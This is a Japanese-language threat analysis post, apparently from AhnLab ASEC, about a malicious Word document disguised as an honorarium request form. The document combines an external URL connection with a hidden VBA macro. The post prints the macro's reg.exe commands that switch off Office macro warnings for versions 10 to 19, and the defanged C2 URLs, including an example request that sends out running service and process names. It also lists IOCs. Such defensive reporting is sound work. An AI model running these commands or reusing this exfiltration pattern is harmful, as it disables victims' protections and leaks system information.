謝金依頼書に偽造した不正な Word(External 接続 + VBA マクロ)

ドキュメント型マルウェアが流行中といっても過言ではないほど様々な形式の不正なドキュメント(HWP、WORD、EXCEL、PDF 等)が出回っており、AhnLab ASEC 分析チームもこれまでに多数の関連内容を提供してきた。そして、今回も新たな形式の不正な Word ドキュメントが確認されたため、これについて紹介する。

「謝金支給依頼書」に偽造した不正な Word 形式で、従来のものとやや異なる点は、不正な External 接続と VBA マクロを同時に使用しているということである。以前ブログで紹介した「対北朝鮮に関する本文内容の不正な Word ドキュメント」も、単体のファイルでは External の不正な URL 接続のみを実行しており、その URL の接続先で新たなドキュメント(マクロ)と連結することで動作するケースであった。

External 接続と VBA マクロを一つのドキュメント内に含み、「謝金支給依頼書」に偽造した今回の不正な Word は、以下のような機能を遂行する。

[図1] – document.xml.rels の内容

上記[図1]のドキュメント内における document.xml.rels の内容から確認できるように、External と記載された不正な URL に接続を試み、ドキュメント内部の settings.yml に構成されている不正な VBA マクロを動作させる。

  • External の不正な URL : hxxp://ftcpark59.getenjoyment.net/1703/blank.php?v=sakim
  • VBA マクロコードが含まれたファイル名 : settings.yml

通常、基本的には Word 内部に VBA マクロを作成すると「vbaProject.bin」という名前でファイルが生成されるが、今回の不正な Word では意図的に「settings.yml」という名前で作成したものと思われる。

[図2] – マクロのファイル名

このドキュメントは、謝金支給のための個人情報と口座情報を作成するようになっているが、不正な行為の実行を誘導するため、意図的にこのように作られたものと見られる。作成された不正な VBA マクロは、特定のキーボードが入力された時に実行するためである。

マクロが実行すると、以下のような機能を遂行する。

  1. マクロが常に実行されるよう、Office のセキュリティ設定を変更する。(レジストリ値の変更)

複数のバージョンにおいてすべての設定が変更されるように、10-19までのバージョンに対してレジストリ値を変更する。「VBAWarnings」値が「1」に設定される場合、Word で内部マクロを常に含むようにする。

reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\13.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\17.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\18.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\19.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
[表1] – レジストリ変更コマンド

2. 不正な URL に接続すると、実行中のサービス名と実行中のプロセスを含めて送信(流出)する。

  • マクロが接続する不正な URL : hxxp://ftcpark59.getenjoyment.net/1703/v.php?w=sakim&v=
  • 実行中のサービス名とプロセス名を抽出して、上記 URL の後ろにつなげて接続を試みる (URL/サービス名/プロセス名)
hxxp://ftcpark59.getenjoyment.net/1703/v.php?w=sakim&v=aelookupsvc appinfo eventsystem fdrespub fontcache gpsvc iphlpsvc lanmanserver lanmanworkstation lmhosts …(中略)… smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe…(中略)…. conhost.exe reg.exe conhost.exe
[表2] – 不正な URL 接続の例

現在は External で接続する URL 以降に追加で受け取るデータはなく、上記のように情報のみ流出している。C2 につながっている環境で攻撃者の意図に応じて追加ファイルをダウンロードするものと予測される。

当該ファイルは、以下のような診断名で検知している。

[ファイル診断]
Downloader/DOC.Generic

[IOC 情報]
hxxp://ftcpark59.getenjoyment.net/1703/blank.php?v=sakim
hxxp://ftcpark59.getenjoyment.net/1703/v.php?w=sakim&v=

3.4 5 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments